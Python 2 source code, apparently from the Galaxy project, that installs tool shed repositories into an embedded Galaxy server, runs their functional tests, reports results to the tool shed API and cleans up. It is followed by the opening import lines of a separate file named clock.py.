repositories = reason_section.findall( 'repository' )
exclude_dict = dict( reason=reason_text, repositories=[] )
for repository in repositories:
repository_tuple = get_repository_tuple_from_elem( repository )
if repository_tuple not in exclude_dict[ 'repositories' ]:
exclude_verbose.append( repository_tuple )
exclude_count += 1
exclude_dict[ 'repositories' ].append( repository_tuple )
exclude_list.append( exclude_dict )
log.debug( '%d repositories excluded from testing...', exclude_count )
if '-list_repositories' in sys.argv:
for name, owner, changeset_revision in exclude_verbose:
if changeset_revision:
log.debug( 'Repository %s owned by %s, changeset revision %s.', name, owner, changeset_revision )
else:
log.debug( 'Repository %s owned by %s, all revisions.', name, owner )
return exclude_list
def register_test_result( url, metadata_id, test_results_dict, repository_info_dict, params ):
'''
Update the repository metadata tool_test_results and appropriate flags using the API.
'''
params[ 'tool_test_results' ] = test_results_dict
if '-info_only' in sys.argv:
return {}
else:
return update( tool_shed_api_key, '%s' % ( url_join( galaxy_tool_shed_url, 'api', 'repository_revisions', metadata_id ) ), params, return_formatted=False )
def remove_generated_tests( app ):
# Delete any configured tool functional tests from the test_toolbox.__dict__, otherwise nose will find them
# and try to re-run the tests after uninstalling the repository, which will cause false failure reports,
# since the test data has been deleted from disk by now.
tests_to_delete = []
tools_to_delete = []
global test_toolbox
for key in test_toolbox.__dict__:
if key.startswith( 'TestForTool_' ):
log.info( 'Tool test found in test_toolbox, deleting: %s', key )
# We can't delete this test just yet, we're still iterating over __dict__.
tests_to_delete.append( key )
tool_id = key.replace( 'TestForTool_', '' )
for tool in app.toolbox.tools_by_id:
if tool.replace( '_', ' ' ) == tool_id.replace( '_', ' ' ):
tools_to_delete.append( tool )
for key in tests_to_delete:
# Now delete the tests found in the previous loop.
del test_toolbox.__dict__[ key ]
for tool in tools_to_delete:
del app.toolbox.tools_by_id[ tool ]
def run_tests( test_config ):
loader = nose.loader.TestLoader( config=test_config )
test_config.plugins.addPlugin( ReportResults() )
plug_loader = test_config.plugins.prepareTestLoader( loader )
if plug_loader is not None:
loader = plug_loader
tests = loader.loadTestsFromNames( test_config.testNames )
test_runner = nose.core.TextTestRunner( stream=test_config.stream,
verbosity=test_config.verbosity,
config=test_config )
plug_runner = test_config.plugins.prepareTestRunner( test_runner )
if plug_runner is not None:
test_runner = plug_runner
result = test_runner.run( tests )
return result, test_config.plugins._plugins
def show_summary_output( repository_info_dicts ):
repositories_by_owner = dict()
for repository in repository_info_dicts:
if repository[ 'owner' ] not in repositories_by_owner:
repositories_by_owner[ repository[ 'owner' ] ] = []
repositories_by_owner[ repository[ 'owner' ] ].append( repository )
for owner in repositories_by_owner:
print "# "
for repository in repositories_by_owner[ owner ]:
print "# %s owned by %s, changeset revision %s" % ( repository[ 'name' ], repository[ 'owner' ], repository[ 'changeset_revision' ] )
def main():
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_INSTALL_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_INSTALL_TEST_PORT', str( default_galaxy_test_port_max ) )
tool_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
galaxy_test_file_dir = os.environ.get( 'GALAXY_INSTALL_TEST_FILE_DIR', default_galaxy_test_file_dir )
if not os.path.isabs( galaxy_test_file_dir ):
galaxy_test_file_dir = os.path.abspath( galaxy_test_file_dir )
use_distributed_object_store = os.environ.get( 'GALAXY_INSTALL_TEST_USE_DISTRIBUTED_OBJECT_STORE', False )
if not os.path.isdir( galaxy_test_tmp_dir ):
os.mkdir( galaxy_test_tmp_dir )
galaxy_test_proxy_port = None
# Set up the configuration files for the Galaxy instance.
shed_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF', os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_data_table_conf.xml' ) )
galaxy_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_TABLE_CONF', tool_data_table_conf )
galaxy_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_CONF', os.path.join( galaxy_test_tmp_dir, 'test_tool_conf.xml' ) )
galaxy_shed_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF', os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_conf.xml' ) )
galaxy_migrated_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_MIGRATED_TOOL_CONF', os.path.join( galaxy_test_tmp_dir, 'test_migrated_tool_conf.xml' ) )
galaxy_tool_sheds_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF', os.path.join( galaxy_test_tmp_dir, 'test_tool_sheds_conf.xml' ) )
galaxy_shed_tools_dict = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DICT_FILE', os.path.join( galaxy_test_tmp_dir, 'shed_tool_dict' ) )
file( galaxy_shed_tools_dict, 'w' ).write( to_json_string( dict() ) )
if 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' in os.environ:
tool_data_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' )
else:
tool_data_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' ] = tool_data_path
# Configure the database connection and path.
if 'GALAXY_INSTALL_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_INSTALL_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to install and test tools.
galaxy_file_path = os.path.join( galaxy_db_path, 'files' )
new_repos_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_tempfiles = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_shed_tool_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir, prefix='shed_tools' )
galaxy_migrated_tool_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Set up the tool dependency path for the Galaxy instance.
tool_dependency_dir = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR', None )
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR' ] = tool_dependency_dir
if 'GALAXY_INSTALL_TEST_DBURI' in os.environ:
database_connection = os.environ[ 'GALAXY_INSTALL_TEST_DBURI' ]
else:
database_connection = 'sqlite:///' + os.path.join( galaxy_db_path, 'install_and_test_repositories.sqlite' )
kwargs = {}
for dir in [ galaxy_test_tmp_dir ]:
try:
os.makedirs( dir )
except OSError:
pass
print "Database connection: ", database_connection
# Generate the shed_tool_data_table_conf.xml file.
file( shed_tool_data_table_conf_file, 'w' ).write( tool_data_table_conf_xml_template )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF' ] = shed_tool_data_table_conf_file
# ---- Start up a Galaxy instance ------------------------------------------------------
# Generate the tool_conf.xml file.
file( galaxy_tool_conf_file, 'w' ).write( tool_conf_xml )
# Generate the tool_sheds_conf.xml file, but only if a the user has not specified an existing one in the environment.
if 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF' not in os.environ:
file( galaxy_tool_sheds_conf_file, 'w' ).write( tool_sheds_conf_xml )
# Generate the shed_tool_conf.xml file.
tool_conf_template_parser = string.Template( shed_tool_conf_xml_template )
shed_tool_conf_xml = tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_shed_tool_path )
file( galaxy_shed_tool_conf_file, 'w' ).write( shed_tool_conf_xml )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF' ] = galaxy_shed_tool_conf_file
# Generate the migrated_tool_conf.xml file.
migrated_tool_conf_xml = tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_migrated_tool_path )
file( galaxy_migrated_tool_conf_file, 'w' ).write( migrated_tool_conf_xml )
# ---- Build Galaxy Application --------------------------------------------------
global_conf = { '__file__' : 'universe_wsgi.ini.sample' }
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
app = UniverseApplication( admin_users = 'test@bx.psu.edu',
allow_user_creation = True,
allow_user_deletion = True,
allow_library_path_paste = True,
database_connection = database_connection,
datatype_converters_config_file = "datatype_converters_conf.xml.sample",
file_path = galaxy_file_path,
global_conf = global_conf,
id_secret = galaxy_encode_secret,
job_queue_workers = 5,
log_destination = "stdout",
migrated_tools_config = galaxy_migrated_tool_conf_file,
new_file_path = galaxy_tempfiles,
running_functional_tests=True,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
shed_tool_path = galaxy_shed_tool_path,
template_path = "templates",
tool_config_file = [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ],
tool_data_path = tool_data_path,
tool_data_table_config_path = galaxy_tool_data_table_conf_file,
tool_dependency_dir = tool_dependency_dir,
tool_path = tool_path,
tool_parse_help = False,
tool_sheds_config_file = galaxy_tool_sheds_conf_file,
update_integrated_tool_panel = False,
use_heartbeat = False,
**kwargs )
log.info( "Embedded Galaxy application started" )
# ---- Run galaxy webserver ------------------------------------------------------
server = None
webapp = buildapp.app_factory( dict( database_file=database_connection ),
use_translogger=False,
static_enabled=False,
app=app )
# Serve the app on a specified or random port.
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s", galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % \
( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ[ 'GALAXY_INSTALL_TEST_PORT' ] = galaxy_test_proxy_port
else:
os.environ[ 'GALAXY_INSTALL_TEST_PORT' ] = galaxy_test_port
# Start the server.
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up.
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded galaxy web server started" )
if galaxy_test_proxy_port:
log.info( "The embedded Galaxy application is running on %s:%s", galaxy_test_host, galaxy_test_proxy_port )
else:
log.info( "The embedded Galaxy application is running on %s:%s", galaxy_test_host, galaxy_test_port )
log.info( "Repositories will be installed from the tool shed at %s", galaxy_tool_shed_url )
success = False
# If a tool_data_table_conf.test.xml file was found, add the entries from it into the app's tool data tables.
if additional_tool_data_tables:
app.tool_data_tables.add_new_entries_from_config_file( config_filename=additional_tool_data_tables,
tool_data_path=additional_tool_data_path,
shed_tool_data_table_config=None,
persist=False )
# Initialize some variables for the summary that will be printed to stdout.
repositories_passed = []
repositories_failed = []
repositories_failed_install = []
exclude_list = []
if os.path.exists( exclude_list_file ):
log.info( 'Loading the list of repositories excluded from testing from the file %s...', exclude_list_file )
exclude_list = parse_exclude_list( exclude_list_file )
try:
# Get a list of repositories to test from the tool shed specified in the GALAXY_INSTALL_TEST_TOOL_SHED_URL environment variable.
log.info( "Retrieving repositories to install from the URL:\n%s\n", str( galaxy_tool_shed_url ) )
if '-check_all_revisions' not in sys.argv:
repositories_to_install = get_repositories_to_install( galaxy_tool_shed_url, latest_revision_only=True )
else:
repositories_to_install = get_repositories_to_install( galaxy_tool_shed_url, latest_revision_only=False )
log.info( "Retrieved %d repositories from the API.", len( repositories_to_install ) )
if '-list_repositories' in sys.argv:
log.info( "The API returned the following repositories, not counting deleted:" )
for repository_info_dict in repositories_to_install:
log.info( "%s owned by %s changeset revision %s",
repository_info_dict.get( 'name', None ),
repository_info_dict.get( 'owner', None ),
repository_info_dict.get( 'changeset_revision', None ) )
repositories_tested = len( repositories_to_install )
# This loop will iterate through the list of repositories generated by the above code, having already filtered out any
# that were marked as deleted. For each repository, it will generate a test method that will use Twill to install that
# repository into the embedded Galaxy application that was started up, selecting to install repository and tool
# dependencies if they are defined. If the installation completes successfully, it will then generate a test case for
# each functional test defined for each tool in the repository, and execute the generated test cases. When this completes,
# it will record the result of the tests, and if any failed, the traceback and captured output of the tool that was run.
# After all tests have completed, the repository is uninstalled, so that the previous test cases don't interfere with
# the next repository's functional tests.
for repository_info_dict in repositories_to_install:
"""
Each repository_info_dict looks something like:
{
"changeset_revision": "13fa22a258b5",
"contents_url": "/api/repositories/529fd61ab1c6cc36/contents",
"deleted": false,
"deprecated": false,
"description": "Convert column case.",
"downloadable": true,
"id": "529fd61ab1c6cc36",
"long_description": "This tool takes the specified columns and converts them to uppercase or lowercase.",
"malicious": false,
"name": "change_case",
"owner": "test",
"private": false,
"repository_id": "529fd61ab1c6cc36",
"times_downloaded": 0,
"tool_shed_url": "http://toolshed.local:10001",
"url": "/api/repository_revisions/529fd61ab1c6cc36",
"user_id": "529fd61ab1c6cc36"
}
"""
repository_status = dict()
params = dict()
repository_id = str( repository_info_dict.get( 'repository_id', None ) )
changeset_revision = str( repository_info_dict.get( 'changeset_revision', None ) )
metadata_revision_id = repository_info_dict.get( 'id', None )
# Add the URL for the tool shed we're installing from, so the automated installation methods go to the right place.
repository_info_dict[ 'tool_shed_url' ] = galaxy_tool_shed_url
# Get the name and owner out of the repository info dict.
name = str( repository_info_dict[ 'name' ] )
owner = str( repository_info_dict[ 'owner' ] )
# Populate the repository_status dict now.
repository_status = get_tool_test_results_from_api( galaxy_tool_shed_url, metadata_revision_id )
if 'test_environment' not in repository_status:
repository_status[ 'test_environment' ] = {}
test_environment = get_test_environment( repository_status[ 'test_environment' ] )
test_environment[ 'galaxy_database_version' ] = get_database_version( app )
test_environment[ 'galaxy_revision'] = get_repository_current_revision( os.getcwd() )
repository_status[ 'test_environment' ] = test_environment
repository_status[ 'passed_tests' ] = []
repository_status[ 'failed_tests' ] = []
repository_status[ 'skip_reason' ] = None
# Iterate through the list of repositories defined not to be installed. This should be a list of dicts in the following format:
# {
# 'reason': The default reason or the reason specified in this section,
# 'repositories':
# [
# ( name, owner, changeset revision if changeset revision else None ),
# ( name, owner, changeset revision if changeset revision else None )
# ]
# },
# If changeset revision is None, that means the entire repository is excluded from testing, otherwise only the specified
# revision should be skipped.
# TODO: When a repository is selected to be skipped, use the API to update the tool shed with the defined skip reason.
skip_this_repository = False
skip_because = None
for exclude_by_reason in exclude_list:
reason = exclude_by_reason[ 'reason' ]
exclude_repositories = exclude_by_reason[ 'repositories' ]
if ( name, owner, changeset_revision ) in exclude_repositories or ( name, owner, None ) in exclude_repositories:
skip_this_repository = True
skip_because = reason
break
if skip_this_repository:
repository_status[ 'not_tested' ] = dict( reason=skip_because )
params[ 'tools_functionally_correct' ] = False
params[ 'do_not_test' ] = False
register_test_result( galaxy_tool_shed_url, metadata_revision_id, repository_status, repository_info_dict, params )
log.info( "Not testing revision %s of repository %s owned by %s.", changeset_revision, name, owner )
continue
else:
log.info( "Installing and testing revision %s of repository %s owned by %s...", changeset_revision, name, owner )
# Explicitly clear tests from twill's test environment.
remove_generated_tests( app )
# Use the repository information dict to generate an install method that will install the repository into the embedded
# Galaxy application, with tool dependencies and repository dependencies, if any.
test_install_repositories.generate_install_method( repository_info_dict )
os.environ[ 'GALAXY_INSTALL_TEST_HOST' ] = galaxy_test_host
# Configure nose to run the install method as a test.
test_config = nose.config.Config( env=os.environ, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the configured install method as a test. This method uses the embedded Galaxy application's web interface to install the specified
# repository, with tool and repository dependencies also selected for installation.
result, _ = run_tests( test_config )
success = result.wasSuccessful()
repository_status[ 'installation_errors' ] = dict( current_repository=[], repository_dependencies=[], tool_dependencies=[] )
try:
repository = test_db_util.get_installed_repository_by_name_owner_changeset_revision( name, owner, changeset_revision )
except:
log.exception( 'Error getting installed repository.' )
success = False
pass
# If the installation succeeds, configure and run functional tests for this repository. This is equivalent to
# sh run_functional_tests.sh -installed
if success:
log.debug( 'Installation of %s succeeded, running all defined functional tests.', name )
# Generate the shed_tools_dict that specifies the location of test data contained within this repository. If the repository
# does not have a test-data directory, this will return has_test_data = False, and we will set the do_not_test flag to True,
# and the tools_functionally_correct flag to False, as well as updating tool_test_results.
file( galaxy_shed_tools_dict, 'w' ).write( to_json_string( dict() ) )
has_test_data, shed_tools_dict = parse_tool_panel_config( galaxy_shed_tool_conf_file, from_json_string( file( galaxy_shed_tools_dict, 'r' ).read() ) )
# The repository_status dict should always have the following structure:
# {
# "test_environment":
# {
# "galaxy_revision": "9001:abcd1234",
# "galaxy_database_version": "114",
# "tool_shed_revision": "9001:abcd1234",
# "tool_shed_mercurial_version": "2.3.1",
# "tool_shed_database_version": "17",
# "python_version": "2.7.2",
# "architecture": "x86_64",
# "system": "Darwin 12.2.0"
# },
# "passed_tests":
# [
# {
# "test_id": "The test ID, generated by twill",
# "tool_id": "The tool ID that was tested",
# "tool_version": "The tool version that was tested",
# },
# ]
# "failed_tests":
# [
# {
# "test_id": "The test ID, generated by twill",
# "tool_id": "The tool ID that was tested",
# "tool_version": "The tool version that was tested",
# "stderr": "The output of the test, or a more detailed description of what was tested and what the outcome was."
# "traceback": "The captured traceback."
# },
# ]
# "installation_errors":
# {
# 'tool_dependencies':
# [
# {
# 'type': 'Type of tool dependency, e.g. package, set_environment, etc.',
# 'name': 'Name of the tool dependency.',
# 'version': 'Version if this is a package, otherwise blank.',
# 'error_message': 'The error message returned when installation was attempted.',
# },
# ],
# 'repository_dependencies':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# 'current_repository':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# {
# "name": "The name of the repository.",
# "owner": "The owner of the repository.",
# "changeset_revision": "The changeset revision of the repository.",
# "error_message": "The message stored in tool_dependency.error_message."
# },
# }
# "missing_test_components":
# [
# {
# "tool_id": "The tool ID that missing components.",
# "tool_version": "The version of the tool."
# "tool_guid": "The guid of the tool."
# "missing_components": "Which components are missing, e.g. the test data filename, or the test-data directory."
# },
# ]
# "not_tested":
# {
# "reason": "The Galaxy development team has determined that this repository should not be installed and tested by the automated framework."
# }
# }
failed_tool_dependencies = repository.includes_tool_dependencies and repository.tool_dependencies_with_installation_errors
failed_repository_dependencies = repository.repository_dependencies_with_installation_errors
if 'missing_test_components' not in repository_status:
repository_status[ 'missing_test_components' ] = []
if not has_test_data:
# If the repository does not have a test-data directory, any functional tests in the tool configuration will
# fail. Mark the repository as failed and skip installation.
log.error( 'Test data is missing for this repository. Updating repository and skipping functional tests.' )
# Record the lack of test data if the repository metadata defines tools.
if 'tools' in repository.metadata:
for tool in repository.metadata[ 'tools' ]:
tool_id = tool[ 'id' ]
tool_version = tool[ 'version' ]
tool_guid = tool[ 'guid' ]
# In keeping with the standard display layout, add the error message to the dict for each tool individually.
missing_components = dict( tool_id=tool_id, tool_version=tool_version, tool_guid=tool_guid,
missing_components="Repository %s is missing a test-data directory." % name )
if missing_components not in repository_status[ 'missing_test_components' ]:
repository_status[ 'missing_test_components' ].append( missing_components )
else:
continue
# Record the status of this repository in the tool shed.
set_do_not_test = not is_latest_downloadable_revision( galaxy_tool_shed_url, repository_info_dict )
params[ 'tools_functionally_correct' ] = False
params[ 'missing_test_components' ] = True
params[ 'do_not_test' ] = str( set_do_not_test )
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
# Run the cleanup method. This removes tool functional test methods from the test_toolbox module and uninstalls the
# repository using Twill.
execute_uninstall_method( app )
# Set the test_toolbox.toolbox module-level variable to the new app.toolbox.
test_toolbox.toolbox = app.toolbox
repositories_failed.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
elif failed_tool_dependencies or failed_repository_dependencies:
# If a tool dependency fails to install correctly, this should be considered an installation error,
# and functional tests should be skipped, since the tool dependency needs to be correctly installed
# for the test to be considered reliable.
log.error( 'One or more tool dependencies of this repository are marked as missing.' )
log.error( 'Updating repository and skipping functional tests.' )
# In keeping with the standard display layout, add the error message to the dict for each tool individually.
for dependency in repository.tool_dependencies_with_installation_errors:
test_result = dict( type=dependency.type,
name=dependency.name,
version=dependency.version,
error_message=dependency.error_message )
repository_status[ 'installation_errors' ][ 'tool_dependencies' ].append( test_result )
for dependency in repository.repository_dependencies_with_installation_errors:
test_result = dict( tool_shed=dependency.tool_shed,
name=dependency.name,
owner=dependency.owner,
changeset_revision=dependency.changeset_revision,
error_message=dependency.error_message )
repository_status[ 'installation_errors' ][ 'repository_dependencies' ].append( test_result )
# Record the status of this repository in the tool shed.
params[ 'tools_functionally_correct' ] = False
params[ 'do_not_test' ] = False
params[ 'test_install_error' ] = True
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
# Run the cleanup method. This removes tool functional test methods from the test_toolbox module and uninstalls the
# repository using Twill.
execute_uninstall_method( app )
# Set the test_toolbox.toolbox module-level variable to the new app.toolbox.
test_toolbox.toolbox = app.toolbox
repositories_failed_install.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
else:
# If the repository does have a test-data directory, we write the generated shed_tools_dict to a file, so the functional
# test framework can find it.
file( galaxy_shed_tools_dict, 'w' ).write( to_json_string( shed_tools_dict ) )
log.info( 'Saved generated shed_tools_dict to %s\nContents: %s', galaxy_shed_tools_dict, str( shed_tools_dict ) )
# Set the GALAXY_TOOL_SHED_TEST_FILE environment variable to the path of the shed_tools_dict file, so that test.base.twilltestcase.setUp
# will find and parse it properly.
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_shed_tools_dict
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_port
# Set the module-level variable 'toolbox', so that test.functional.test_toolbox will generate the appropriate test methods.
test_toolbox.toolbox = app.toolbox
# Generate the test methods for this installed repository. We need to pass in True here, or it will look
# in $GALAXY_HOME/test-data for test data, which may result in missing or invalid test files.
test_toolbox.build_tests( testing_shed_tools=True )
# Set up nose to run the generated functional tests.
test_config = nose.config.Config( env=os.environ, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the configured tests.
result, test_plugins = run_tests( test_config )
success = result.wasSuccessful()
# Use the ReportResults nose plugin to get a list of tests that passed.
for plugin in test_plugins:
if hasattr( plugin, 'getTestStatus' ):
test_identifier = '%s/%s' % ( owner, name )
passed_tests = plugin.getTestStatus( test_identifier )
break
repository_status[ 'passed_tests' ] = []
for test_id in passed_tests:
# Normalize the tool ID and version display.
tool_id, tool_version = get_tool_info_from_test_id( test_id )
test_result = dict( test_id=test_id, tool_id=tool_id, tool_version=tool_version )
repository_status[ 'passed_tests' ].append( test_result )
if success:
# This repository's tools passed all functional tests. Update the repository_metadata table in the tool shed's database
# to reflect that. Call the register_test_result method, which executes a PUT request to the repository_revisions API
# controller with the status of the test. This also sets the do_not_test and tools_functionally correct flags, and
# updates the time_last_tested field to today's date.
repositories_passed.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
params[ 'tools_functionally_correct' ] = True
params[ 'do_not_test' ] = False
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
log.debug( 'Revision %s of repository %s installed and passed functional tests.', changeset_revision, name )
else:
# If the functional tests fail, log the output and update the failed changeset revision's metadata record in the tool shed via the API.
for failure in result.failures + result.errors:
# Record the twill test identifier and information about the tool, so the repository owner can discover which test is failing.
test_id = str( failure[0] )
tool_id, tool_version = get_tool_info_from_test_id( test_id )
test_status = dict( test_id=test_id, tool_id=tool_id, tool_version=tool_version )
log_output = failure[1].replace( '\\n', '\n' )
# Remove debug output that the reviewer or owner doesn't need.
log_output = re.sub( r'control \d+:.+', r'', log_output )
log_output = re.sub( r'\n+', r'\n', log_output )
appending_to = 'output'
tmp_output = {}
output = {}
# Iterate through the functional test output and extract only the important data. Captured logging and stdout are not recorded.
for line in log_output.split( '\n' ):
if line.startswith( 'Traceback' ):
appending_to = 'traceback'
elif '>> end captured' in line or '>> end tool' in line:
continue
elif 'request returned None from get_history' in line:
continue
elif '>> begin captured logging <<' in line:
appending_to = 'logging'
continue
elif '>> begin captured stdout <<' in line:
appending_to = 'stdout'
continue
elif '>> begin captured stderr <<' in line or '>> begin tool stderr <<' in line:
appending_to = 'stderr'
continue
if appending_to not in tmp_output:
tmp_output[ appending_to ] = []
tmp_output[ appending_to ].append( line )
for output_type in [ 'stderr', 'traceback' ]:
if output_type in tmp_output:
test_status[ output_type ] = '\n'.join( tmp_output[ output_type ] )
repository_status[ 'failed_tests' ].append( test_status )
# Call the register_test_result method, which executes a PUT request to the repository_revisions API controller with the outcome
# of the tests, and updates tool_test_results with the relevant log data.
# This also sets the do_not_test and tools_functionally correct flags to the appropriate values, and updates the time_last_tested
# field to today's date.
repositories_failed.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
set_do_not_test = not is_latest_downloadable_revision( galaxy_tool_shed_url, repository_info_dict )
params[ 'tools_functionally_correct' ] = False
params[ 'do_not_test' ] = str( set_do_not_test )
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
log.debug( 'Revision %s of repository %s installed successfully, but did not pass functional tests.',
changeset_revision, name )
# Run the uninstall method. This removes tool functional test methods from the test_toolbox module and uninstalls the
# repository using Twill.
log.debug( 'Uninstalling changeset revision %s of repository %s',
repository_info_dict[ 'changeset_revision' ],
repository_info_dict[ 'name' ] )
success = execute_uninstall_method( app )
if not success:
log.error( 'Repository %s failed to uninstall.', repository_info_dict[ 'name' ] )
# Set the test_toolbox.toolbox module-level variable to the new app.toolbox.
test_toolbox.toolbox = app.toolbox
else:
# Even if the repository failed to install, execute the uninstall method, in case a dependency did succeed.
log.debug( 'Uninstalling repository %s', repository_info_dict[ 'name' ] )
try:
repository = test_db_util.get_installed_repository_by_name_owner_changeset_revision( name, owner, changeset_revision )
except:
log.exception( 'Unable to uninstall, no installed repository found.' )
continue
test_result = dict( tool_shed=repository.tool_shed,
name=repository.name,
owner=repository.owner,
changeset_revision=repository.changeset_revision,
error_message=repository.error_message )
repository_status[ 'installation_errors' ][ 'repository_dependencies' ].append( test_result )
params[ 'tools_functionally_correct' ] = False
params[ 'test_install_error' ] = True
params[ 'do_not_test' ] = False
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
success = execute_uninstall_method( app )
if not success:
log.error( 'Repository %s failed to uninstall.', repository_info_dict[ 'name' ] )
repositories_failed_install.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
log.debug( 'Repository %s failed to install correctly.', repository_info_dict[ 'name' ] )
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
# Gracefully shut down the embedded web server and UniverseApplication.
if server:
log.info( "Shutting down embedded galaxy web server" )
server.server_close()
server = None
log.info( "Embedded galaxy server stopped" )
if app:
log.info( "Shutting down galaxy application" )
app.shutdown()
app = None
log.info( "Embedded galaxy application stopped" )
# Clean up test files unless otherwise specified.
if 'GALAXY_INSTALL_TEST_NO_CLEANUP' not in os.environ:
try:
for dir in [ galaxy_test_tmp_dir ]:
if os.path.exists( dir ):
log.info( "Cleaning up temporary files in %s", dir )
shutil.rmtree( dir )
except:
pass
else:
log.debug( 'GALAXY_INSTALL_TEST_NO_CLEANUP set, not cleaning up.' )
now = strftime( "%Y-%m-%d %H:%M:%S" )
print "####################################################################################"
print "# %s - repository installation and testing script completed." % now
print "# Repository revisions tested: %d" % repositories_tested
if '-info_only' in sys.argv:
print "# -info_only set, not updating the tool shed."
if repositories_tested > 0:
if repositories_passed:
print '# ----------------------------------------------------------------------------------'
print "# %d repositories passed all tests:" % len( repositories_passed )
show_summary_output( repositories_passed )
if repositories_failed:
print '# ----------------------------------------------------------------------------------'
print "# %d repositories failed one or more tests:" % len( repositories_failed )
show_summary_output( repositories_failed )
if repositories_failed_install:
# Set success to False so that the return code will not be 0.
success = False
print '# ----------------------------------------------------------------------------------'
print "# %d repositories with installation errors:" % len( repositories_failed_install )
show_summary_output( repositories_failed_install )
else:
success = True
else:
success = True
print "####################################################################################"
# Normally, the value of 'success' would determine whether this test suite is marked as passed or failed
# in the automated buildbot framework. However, due to the procedure used here, we only want to report
# failure if a repository fails to install correctly. Therefore, we have overriden the value of 'success'
# here based on what actions the script has executed.
if success:
return 0
else:
return 1
if __name__ == "__main__":
now = strftime( "%Y-%m-%d %H:%M:%S" )
print "####################################################################################"
print "# %s - running repository installation and testing script." % now
print "####################################################################################"
sys.exit( main() )
|
clock.py
|
import asyncio
import time
from threading import Thread
from jukebox.lcd import LCD, LCDRow
